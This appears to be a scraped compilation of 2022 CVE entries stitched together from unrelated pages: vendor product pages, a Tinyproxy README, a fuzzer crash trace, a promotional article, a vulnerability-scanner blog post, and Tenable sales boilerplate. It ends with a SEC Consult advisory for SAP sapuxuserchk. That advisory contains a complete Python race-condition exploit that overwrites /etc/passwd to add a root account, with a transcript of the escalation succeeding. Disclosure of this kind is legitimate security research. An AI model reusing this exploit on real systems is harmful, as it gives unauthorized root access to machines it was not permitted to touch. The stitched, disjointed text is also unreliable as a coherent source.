A potential unathenticated file deletion vulnerabilty on Trend Micro Mobile Security for Enterprise 9.8 SP5 could allow an attacker with access to the Management Server to delete files.

This issue was resolved in 9.8 SP5 Critical Patch 2.

CVE-2022-40980

Tinyproxy commit 84f203f and earlier does not process HTTP request lines in the process_request() function and is using uninitialized buffers. This vulnerability allows attackers to access sensitive information at system runtime.

**Tinyproxy**

Tinyproxy is a small, efficient HTTP/SSL proxy daemon released under the GNU General Public License. Tinyproxy is very useful in a small network setting, where a larger proxy would either be too resource intensive, or a security risk. One of the key features of Tinyproxy is the buffering connection concept. In effect, Tinyproxy will buffer a high speed response from a server, and then relay it to a client at the highest speed the client will accept. This feature greatly reduces the problems with sluggishness on the Internet. If you are sharing an Internet connection with a small network, and you only want to allow HTTP requests to be allowed, then Tinyproxy is a great tool for the network administrator.

For more info, please visit the Tinyproxy web site.

**Installation**

Tinyproxy uses a standard GNU configure script based on the automake system. If compiling from a git checkout, you need to first run

from the top level directory to generate the configure script. The release tarball contains the pre-created configure script, so when building from a release, you can skip this step. Then basically all you need to do is

    ./configure
    make
    make install
    

in the top level directory to compile and install Tinyproxy. There are additional command line arguments you can supply to configure. They include:

*   --enable-debug: If you would like to turn on full debugging support.
    
*   --enable-xtinyproxy: Compile in support for the XTinyproxy header, which is sent to any web server in your domain.
    
*   --enable-filter: Allows Tinyproxy to filter out certain domains and URLs.
    
*   --enable-upstream: Enable support for proxying connections through another proxy server.
    
*   --enable-transparent: Allow Tinyproxy to be used as a transparent proxy daemon. Unlike other work modes, transparent proxying doesn't require explicit configuration and works automatically when traffic is redirected to the proxy using the appropriate firewall rules.
    
*   --enable-reverse: Enable reverse proxying.
    
*   --with-stathost=HOST: Set the default name of the stats host.
    

For more information about the build system, read the INSTALL file that is generated by autogen.sh and comes with the release tar ball.

**Support**

If you are having problems with Tinyproxy, please raise an issue on github.

**Contributing**

If you would like to contribute a feature, or a bug fix to the Tinyproxy source, please clone the git repository from github and create a pull request.

**Community**

You can meet developers and users to discuss development, patches and deployment issues in the #tinyproxy IRC channel on libera (irc.libera.chat).

CVE-2022-40468: GitHub - tinyproxy/tinyproxy: tinyproxy - a light-weight HTTP/HTTPS proxy daemon for POSIX operating systems

A stored Cross-Site Scripting (XSS) vulnerability in OPSWAT MetaDefender ICAP Server before 4.13.0 allows attackers to execute arbitrary JavaScript or HTML because of the blocked page response.

Advanced Threat Prevention for Network Traffic

Cybercriminals relentlessly attempt to upload malware to your systems. Employees accidentally visit malicious websites or download harmful files and vulnerable software from the internet. Both internal and external users intendedly or unintendedly submit files containing sensitive data.

Enterprises need a powerful multi-layered cybersecurity system to prevent harmful, offensive or inappropriate content.  

MetaDefender ICAP Server protects your systems and users by inspecting every file traveling through your network. Every file is scanned for malware and vulnerabilities. With custom policies and workflows, suspicious files can be blocked or deeply sanitized. Sensitive information is blocked, removed or redacted before leaving your network. All files are remediated, before they are accessible to the end user.

MetaDefender ICAP Server is a plug-and-play solution to protect your network against malicious internet content.

**How an ICAP Server works**

MetaDefender ICAP Server provides ICAP interface on top of MetaDefender Core to provide industry leading advanced threat protection. Any content routed through the ICAP interface will be scanned and processed before entering your network and reaching end users.

MetaDefender ICAP Server can seamlessly integrate with any ICAP enabled network appliances, including reverse proxies, web application firewalls, load balancers, forward proxies, web gateways, SSL inspectors, etc.

**ICAP Server Benefits**

*   Real-time comprehensive threat detection and prevention for your network
*   Protection from malicious file uploads at the gateway of your network
*   Protection against zero-day and advanced targeted attacks
*   Detect file-based vulnerabilities before they are installed.
*   No more sensitive data entering or leaving your organization without your discretion
*   Custom policies, workflow and analysis rules to meet your unique security needs
*   Simple integration with any ICAP enabled devices

**Integration Use Cases**

**File Upload Security**

Protect your network and application web servers from malicious file uploads using MetaDefender ICAP Server by inspecting files for any embedded malware and malicious content before they reach your website.

Includes: Application Delivery Controller, Reverse Proxy and Load Balancer, Web Application Firewall

Supports: F5 Advanced WAF™, F5 Big-IP® ASM™, F5 Big-IP LTM™, Citrix ADC, Avi Vantage (VMware), Symantec ProxySG

**Enterprise File Transfer and Storage**

Add another layer of trust to your business best practices by implementing MetaDefender ICAP Server at the central file transfer gateway or repository.

Includes: Managed File Transfer, Enterprise Storage, Secure Remote Access

Supports: Axway B2Bi, GoAnywhere MFT, Progress MOVEit, GlobalScape EFT, Dell EMC Isilon, Claroty SRA

**Web Traffic Security and SSL Inspection**

Prevent malicious files from being downloaded from the internet by your users. Screen web traffic before it reaches your secured network using MetaDefender ICAP Server integrated at the network gateway.

Includes: Forward Proxy, Web Gateway and Firewall, SSL Inspection and Termination, Intrusion Prevention System

Supports: Squid, McAfee Web Gateway™, Fortinet FortiGate®, F5 SSL Orchestrator™, A10 Thunder® SSLi®

CVE-2022-40778: MetaDefender ICAP Server - Trust your network traffic - OPSWAT

An issue was discovered in Bento4 through 1.6.0-639. A NULL pointer dereference occurs in AP4_StszAtom::WriteFields.

Hi there, I use my fuzzer for fuzzing the binary mp4decrypt, and this binary crashes with the following:

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==24087==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000702ee8 bp 0x7ffcf40a75f0 sp 0x7ffcf40a73b0 T0)
    ==24087==The signal is caused by a READ memory access.
    ==24087==Hint: address points to the zero page.
        #0 0x702ee8 in AP4_StszAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x702ee8)
        #1 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
        #2 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
        #3 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
        #4 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
        #5 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
        #6 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
        #7 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
        #8 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
        #9 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
        #10 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
        #11 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
        #12 0x62cea7 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzztest/mp4decrypt/mp4decrypt+0x62cea7)
        #13 0x412846 in main (/fuzztest/mp4decrypt/mp4decrypt+0x412846)
        #14 0x7fcaa49f1c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #15 0x407c99 in _start (/fuzztest/mp4decrypt/mp4decrypt+0x407c99)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/fuzztest/mp4decrypt/mp4decrypt+0x702ee8) in AP4_StszAtom::WriteFields(AP4_ByteStream&)
    ==24087==ABORTING

CVE-2022-40775: SEGV error · Issue #758 · axiomatic-systems/Bento4

By Waqas
Meet Akeyless, a secure identity and access management platform that helps organizations manage user identities, passwords, and access control. 
This is a post from HackRead.com Read the original post: Akeyless Empowers Enterprise Code Security with Comprehensive Secrets Management

Today’s enterprise IT infrastructures are built for speed and scalability, conditions that make Akeyless’s secrets management solution all the more useful. Companies like Cimpress, Stash, and Constant Contact have turned to Akeyless for help with secrets management, which makes sense given the way today’s operations, development, and security teams operate. 

Considering the competitive business landscape, having the ability to get workloads online as quickly as possible has become an advantage. As such, organizations are actively embracing the DevOps approach to software supply chains, which often involves extensive containerization and automated orchestration. 

Acumen Research and Consulting predicts that the global DevOps market will reach $37 billion in revenues by 2030. The move to hybrid and cloud-native app development, which require resources to communicate with one another, has made secrets such as credentials, passwords, certificates, and keys, an integral aspect of IT management. Secrets facilitate the interconnectedness of infrastructure components. Users, devices, and applications must undergo verification and credential exchanges to connect and interact with others securely. 

Because all workloads now involve IT, it is possible for even a small enterprise to have thousands of secrets in use within its ecosystem, giving rise to the problem of secrets sprawl. IT teams often lack complete oversight and visibility over all the secrets across the organization, making zero trust principles like dynamic, “just in time” credential generation, a major challenge. 

This challenge often ultimately becomes an alarming security issue. Leaked passwords from human users are obviously potential security risks; static secrets such as keys and certificates can also be left neglected on servers and instances. Malicious actors can exploit any secret in use. According to Verizon, stolen credentials account for nearly half of today’s data breaches.

Akeyless looks to solve this issue for enterprises through its SaaS-based solution. Through its Akeyless Vault Platform, the company enables security teams a comprehensive control, injecting all credentials as needed, across the organization, whether on-premises or in the cloud. By centralizing oversight and control, companies can assign, revoke, and redeploy efficiently and securely.

**Overcoming Security Silos**

While there are older ways to manage secrets, they are generally tied to a particular type of secret. For example, credentials and levels of access are often managed using identity and access management tools. Username and password combinations are organized using password managers or, as often is the case, Excl sheets. Companies requiring more robust security use devices like hardware security modules to store their keys and process encryption.

While many of these solutions can be effective independently, they can lack interoperability. Security teams often end up using several tools to manage all of their secrets, which do support integrations and DevOps use cases. This becomes a stumbling block for organizations looking to leverage orchestration and automation. 

Akeyless works around this by unifying the management of secrets to a single platform,  including passwords, keys, and certificates, with a back end that refreshes and encrypts keys across environments, injecting them into code using API calls.

As a SaaS solution, implementing Akeyless is quick and easy. Individual users can instantly take advantage of multi-tenant password management. They can even conveniently sign in to services using a browser extension. If the organization is already using other secret managers, Akeyless can readily import data from Kubernetes Secrets Manager, HashiCorp Vault, and Azure Key Vault. 

The platform’s native integrations with DevOps solutions like Terraform, Jenkins, and CircleCI ensure that coders can maintain security without the need to change work environments. 

The Akeyless dashboard also features an intuitive interface that allows IT teams to organize secrets using folders and subfolders, much like how file systems in operating systems work. Access and permissions can then be assigned to these folders. This way, CISOs, and IT teams will be able to sort secrets as they see fit. For instance, folders can be organized according to business units, making it easy to identify which groups have access to particular secrets.

**Integrating into Modern Workflows**

A defining advantage that the platform offers is its seamless integration into workflows. Akeyless can be hooked up to identity providers like Active Directory and Okta. The platform also provides an SDK, allowing developers to integrate Akeyless into existing libraries, scripts, and applications. It can integrate seamlessly into DevOps pipelines, including with CI/CD tools like CircleCI, GitHub, and Jenkins.

Enterprises can also use Akeyless to handle dynamic or rotating secrets. Assigning and reassigning keys and certificates is usually done during provisioning and as part of security measures, and that these tasks can be managed centrally and automatically is a game-changer for enterprises leveraging the cloud, DevOps, and containerization. 

The typical back-and-forth between development and IT teams for requests to generate keys and assign certificates can be eliminated, allowing for greater efficiency across the enterprise.

**Achieving Zero-Knowledge Security**

Akeyless believes that enterprises should retain complete control and ownership of their secrets through zero-knowledge security. 

Akeyless’s patented Distributed Fragments Cryptography (DFC) technology makes this possible. Not even Akeyless can see any of the actual secrets stored on the platform or reveal them cryptographically. Secrets information is stored in secure fragments distributed in different servers and regions and constantly refreshed mathematically.

Users keep a key fragment in their own environment, which is used to prove themselves as trusted identities. Through DFC, there is no need to reassemble the fragmented encryption keys. It becomes virtually impossible for secrets to be compromised by external threat actors.

With all these capabilities, Akeyless ultimately provides a comprehensive and practical secret management solution for the modern enterprise. Security and product teams alike can become true custodians of secrets and security in their respective organizations while enabling efficiency for all IT stakeholders.

1.  What Are the Security Benefits of Using a Digital Signature?
2.  Ways That VoIP Technology Is Impacting Marketplaces and How to Adapt
3.  Software Architects Manage Technical Debt in a Microservice Architecture
4.  Automation Affects The Interpretation Profession And Interpreting Services

Akeyless Empowers Enterprise Code Security with Comprehensive Secrets Management

Hello everyone! This video was recorded for the VMconf 22 Vulnerability Management conference, vmconf.pw. I will be talking about my open source project Scanvus. This project is already a year old and I use it almost every day. Alternative video link (for Russia): https://vk.com/video-149273431_456239100 Scanvus (Simple Credentialed Authenticated Network VUlnerability Scanner) is a vulnerability scanner for Linux. Currently for Ubuntu, Debian, CentOS, […]

Hello everyone! This video was recorded for the VMconf 22 Vulnerability Management conference, vmconf.pw. I will be talking about my open source project Scanvus. This project is already a year old and I use it almost every day.

Alternative video link (for Russia): https://vk.com/video-149273431\_456239100

**Scanvus** (**S**imple **C**redentialed **A**uthenticated **N**etwork **VU**lnerability **S**canner) is a vulnerability scanner for Linux. Currently for Ubuntu, Debian, CentOS, RedHat, Oracle Linux and Alpine distributions. But in general for any Linux distribution supported by the Vulners Linux API. The purpose of this utility is to get a list of packages and Linux distribution version from some source, make a request to an external vulnerabililty detection API (only Vulners Linux API is currently supported), and show the vulnerability report.

Scanvus can show vulnerabilities for

*   localhost
*   remote host via SSH
*   docker image
*   inventory file of a certain format

This utility greatly simplifies Linux infrastructure auditing. And besides, this is a project in which I can try to implement my ideas on vulnerability detection.

**Example of output**

For all targets the output is the same. It contains information about the target and the type of check. Then information about the OS version and the number of Linux packages. And finally, the actual information about vulnerabilities: how many vulnerabilities were found and the criticality levels of these vulnerabilities. The table shows the criticality level, bulletin ID, CVE list for the bulletin, and a comparison of the invulnerable fixed package version with the actual installed version.

This report is not the only way to present results. You can optionally export the results to JSON (OS inventory data, raw vulnerability data from Vulners Linux API or processed vulnerability data).

**Installation and configuration**

For the Scanvus to work, you need to install python and python modules from requirements.txt. Then add the Vulners API key to credentials.py.

    sudo apt-get update
    sudo apt-get install python3.8 python3.8-pip git
    git clone https://github.com/leonov-av/scanvus.git
    cd scanvus/
    pip3 install -r requirements.txt
    # Set API Key in credentials.py

To detect vulnerabilities in docker images, you must install docker on your system. For example in Ubuntu, you should add docker repo and install packages docker-ce, docker-ce-cli, containerd.io.

    sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release
    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
    echo "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
    sudo apt-get update
    sudo apt-get install docker-ce docker-ce-cli containerd.io

Then set up the docker group:

    sudo groupadd docker
    sudo usermod -aG docker $USER
    newgrp docker
    docker run hello-world

And start the docker service:

    service docker start
    sudo chmod 666 /var/run/docker.sock

**Supported targets**

You can run a scan for the following targets:

**Localhost**

    python3.8 scanvus.py --assessment-type "localhost"

In this case, the host where Scanvus is installed will be analyzed. This means that an inventory bash script will be executed directly on the host, packages and OS version will be collected, and then vulnerabilities will be detected.

**Remote hosts via SSH (key authentication)**

    python3.8 scanvus.py --assessment-type "remote_ssh"  --host "linuxserver1@corporation.com" --user-name "jsmith" --key-path "/home/jsmith/.ssh/id_rsa"

In this case, Scanvus will connect to the remote host via SSH using a key for authentication. It will then run an inventory bash script on the host, and this data will be used to identify vulnerabilities. Password authentication is not yet supported and does not seem to be particularly needed.

**Docker images**

    python3.8 scanvus.py --assessment-type "docker_image" --docker-image "python:3.9.6-slim-bullseye" 

In this case, Scanvus will try to launch a docker container and start executing bash commands in it. Scanvus will either run the entire inventory bash script there, or try to run individual inventory commands.

Is it always possible? Not really. For example, the docker container may not have a cat utility, a package management utility like rpm or dpkg, or even a shell like bash. I’ll try to find other ways to get the data I need without running a docker container. For now, in such cases, you can use specialized tools for analyzing docker base images, such as trivy, although they do not give as reliable results as detection based on package versions.

**Inventory file**

I think this is the most important feature of this project. It allows you to separate inventory and vulnerability detection. Let’s say you need to quickly check some Linux host that you don’t have access to and that access is hard to get. You can run Scanvus with the –show-inventory-script option, it will show a one-liner bash script for auditing.

    python3.8 scanvus.py --show-inventory-script

You can then give this bash script to your system administrator, who will run it on systems you don’t have access to at all and pass the output of the scripts to you. And based on the output you get, you can detect vulnerabilities using Scanvus.

    python3.8 scanvus.py --assessment-type inventory_file --inventory-file-path invent.txt

So, in theory, you can conduct audits without any access to the infrastructure at all.

**Is it free? Not really.**

As you can imagine, since Scanvus currently only uses the Vulners Linux API, it is not completely free. Of course, you can use it for free for non-commercial and research purposes (up to 100 credits per month), but for commercial use you will need to purchase a license from Vulners.

The main advantage of Vulners is that it supports literally all popular Linux distributions. Therefore, if you have a wide variety of Linux systems in your infrastructure, the Vulners Linux API is almost the only choice.

Will it be possible in the future to use Scanvus without Vulners Linux API? If there is an alternative API that can be used to detect Linux vulnerabilities by packages and OS version, then this can be done. 🙂 Maybe we can even think about a free API for some Linux systems. If you have any ideas on alternative assessment methods and APIs, write to avleonovchat in telegram.

**In conclusion**

Scanvus is a small but useful utility that I use regularly. If you like it too, please go to my github and give it a star. 😉

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

Scanvus – my open source Vulnerability Scanner for Linux hosts and Docker images

When logging in to a VBASE runtime project via Web-Remote, the product uses XOR with a static initial key to obfuscate login messages. An unauthenticated remote attacker with the ability to capture a login session can obtain the login credentials.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2022-31

CVSSv3 Base / Temporal Score

CVSSv3 Vector

AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Thank You**

Thank you for your interest in Tenable.ot. A representative will be in touch soon.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See Tenable.ep In Action**

Know the exposure of every asset on any platform.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2022-3217: VISAM VBASE v11.7.0.2 Credential Disclosure

Incorrect access control in Watchdog Anti-Virus v1.4.158 allows attackers to perform a DLL hijacking attack and execute arbitrary code via a crafted binary.

CVE-2022-38611: WatchDog Anti-Virus Research

SAPControl Web Service Interface (sapstartsrv) suffers from a privilege escalation vulnerability via a race condition.

SEC Consult Vulnerability Lab Security Advisory < 20220915-0 >  
=======================================================================  
               title: Local privilege escalation  
             product: SAP® SAPControl Web Service Interface (sapuxuserchk)  
  vulnerable version: see section "Vulnerable /  tested versions"  
       fixed version: see SAP security note 3158619  
          CVE number: CVE-2022-29614  
              impact: medium  
            homepage: https://www.sap.com/about.html  
               found: 2022-02-24  
                  by: M. Li (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"The SAP Start Service (sapstartsrv) provides basic management services for  
systems and instances and single server processes. Services include starting  
and stopping, monitoring the current run-time state, reading logs, traces and  
configuration files, executing commands and retrieving other  
technology-specific information, like network access points, active sessions,  
thread list etc. They are exposed by a SOAP Web service interface named  
"SAPControl". This paper describes how to use this Web service interface."

Source: https://assets.cdn.sap.com/sapcom/docs/2016/09/0a40e60d-8b7c-0010-82c7-eda71af511fa.pdf

Business recommendation:  
------------------------  
SEC Consult recommends to implement the security note 3158619, where the  
documented issue is fixed according to the vendor. We advise installing the  
corrections as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:  
-----------------------------------  
1) Local privilege escalation (CVE-2022-29614)  
The SUID-root program sapuxuserchk erroneously follows the symbolic link to  
create a temporary local logon ticket and change the ownership of the target  
file for owner access only. As member of the group sapsys, a user can therefore  
escalate his/her privileges to root on a local Unix system by successfully  
exploiting a race condition.

Proof of concept:  
-----------------  
1) Local privilege escalation (CVE-2022-29614)  
The utility sapuxuserchk is used by sapcontrol to request a temporary local  
logon ticket in the following way. As a result, the ticket is created in the  
folder /usr/sap/SEC/D00/work/sapcontrol_logon/

$ sapcontrol -nr 0 -function RequestLogonFile user0

$ ls -l logon*  
-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0  
-rw------- 1 user0  users  40 Feb 25 09:00 logon1  
-rw------- 1 root   root   40 Feb 25 09:01 logon2

Since sapcontrol is supposed to create the ticket for any system user, it  
requires a utility with SUID bit set. The owner, group and its permission bits  
of sapuxuserchk of a standard installation are shown below.

$ ls -l sapuxuserchk  
-rwsr-x--- 1 root sapsys 1312137 Feb 28  2019 sapuxuserchk

The request originating from sapcontrol is first sent to the instance server  
sapstartsrv, piping into sapuxuserchk a 512-byte encrypted message, which  
contains the ticket path, user name and ticket in the plaintext, as an example  
shown below.

$ strings input-0-plaintext  
SAPLOGONFILE /usr/sap/SEC/D00/work/sapcontrol_logon/logon1  
  user0  
1133146902252676394602837452470900726967

On its duty to create the ticket, sapuxuserchk performs the sanity check to  
guarantee the non-existence of the file prior to the creation in the  
function internal_create_saplogon_file.

However, it introduces a race condition between the stat and open calls, as  
shown by the following excerpt from strace.

stat("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)  
open("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3  
  fchown(3, 1000, 100)

The attacker can run a race of constantly creating a symbolic link logon1  
pointing to a privileged file such as /etc/passwd and meanwhile invoke the  
SUID-root program sapuxuserchk, in the hope that the creation of the link  
take place between the stat and open calls, so that the first will fail,  
(meaning that the file does not exist yet) while the second as well as the  
ensuing fchown call succeeds. In a positive result, the attacker gains the  
read-write permission of the target file.

The following run to winning the race took 629 attempts to finally gain the  
root privilege. The PoC further below lists the exploit implementing the idea  
above with a pre-intercepted message for user secadm.

-------------------------------------------------------------------------  
sh-4.3$ id  
uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)

sh-4.3$ ls -l /etc/passwd  
-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd

sh-4.3$ python3 sapmatt.py  
this many tries: 629  
[+] now login as sapmatt

sh-4.3$ su sapmatt  
Password:

sh-4.3# id  
uid=0(sapmatt) gid=0(root) groups=0(root)

sh-4.3# ls -l /etc/passwd  
-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd

$ cat sapmatt.py  
import sys, os, signal, base64, random, string

secadm_msg =   
b'O9OXlWwex4ddSI5vhXFfUQvZ8Td3NWzRNIb9QN6bHY764Z0zVNuVjFHRGhHEgYgwNQDnf0/bBwzlEXCSXFkhtiDqDohuyCxG4mtRqc86FlB6DTOjBY9o/6Cb3rRSZ58jggx71JXMRk21jW3gqdem+tmqHCnIumZjodk2cuk5/MY76dsD65s3j1XrQS0RT3gPaspl/6Yb842hbVTZXVRY3cHKzNq5tZMKB2LmyyslO4xCI00eBN6k6yEKNFLvMx8lYbAIaHcfdWu3pMWVIb9rT3BoTCHwi5hBz8dHk6usdEw05q/Xuxe28gxWCUZpN09sYsd/5R8HqqLfwyiNI7CTBCA3f+fHUweJPuteD5O8bwo/mEOShHimO1gPZzhBdow2C0JszYQeQpxgRtENXPUt2qgT7TJqmItxM0puB8ry0TnKJIbk5gj0smflBPBZyTDXl+qNUmgWL1dK/SBpTUErGMVXFVBi8bNDMSUhcJa+0IQlYSBHPln17kquqhGvlRYYZVJttDNoYcvBchc4HxHZmH5pHkD4fhbcQgFT0UFgceSH1j3sE6G/M/QM1X/vTVE4534XJ3mDcFk/brOYun1dawJ30BkJ9HbP5weihwRwspOq52qRZ9CXsnJCtFPNqNWNIe8BgQUW8WV7FkiDJ+Lpp0pq8KLlZ0Yomz46YfCHkag='  
# openssl passwd sappass  
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"  
logon_symlink = "/usr/sap/SEC/D00/work/sapcontrol_logon/logon1"  
target_file = "/etc/passwd"

g = 1024  
if not os.path.isfile(logon_symlink):  
         os.system("touch " + logon_symlink)  
secadm_msg = base64.b64decode(secadm_msg)

msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))  
f0 = open(msg_file, "wb")  
f0.write(secadm_msg)  
f0.close()

pid = os.fork()  
if pid == 0:  
         j = 0  
         while True:  
                 if j > g:  
                         print('done')  
                         os._exit(os.EX_OK)  
                 j += 1  
                 os.system("/usr/sap/SEC/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))  
else:  
         i = 0  
         uid = os.getuid()  
         success = False  
         while not success:  
                 if i > g:  
                         print("[-] give up, link too many tries: " + str(i))  
                         break  
                 i += 1  
                 try:  
                         os.unlink(logon_symlink)  
                         os.symlink(target_file, logon_symlink)  
                         statinfo = os.stat(target_file)  
                         if statinfo.st_uid == uid:  
                                 os.kill(pid, signal.SIGILL)  
                                 print("this many tries: " + str(i))  
                                 print("[+] now login as sapmatt ")  
                                 f = open(target_file, "w")  
                                 f.write(u1_passwd)  
                                 f.close()  
                                 success = True  
                 except Exception as err:  
                         print('[-] lost the race {0}'.format(err))  
         os.waitpid(pid, 0)  
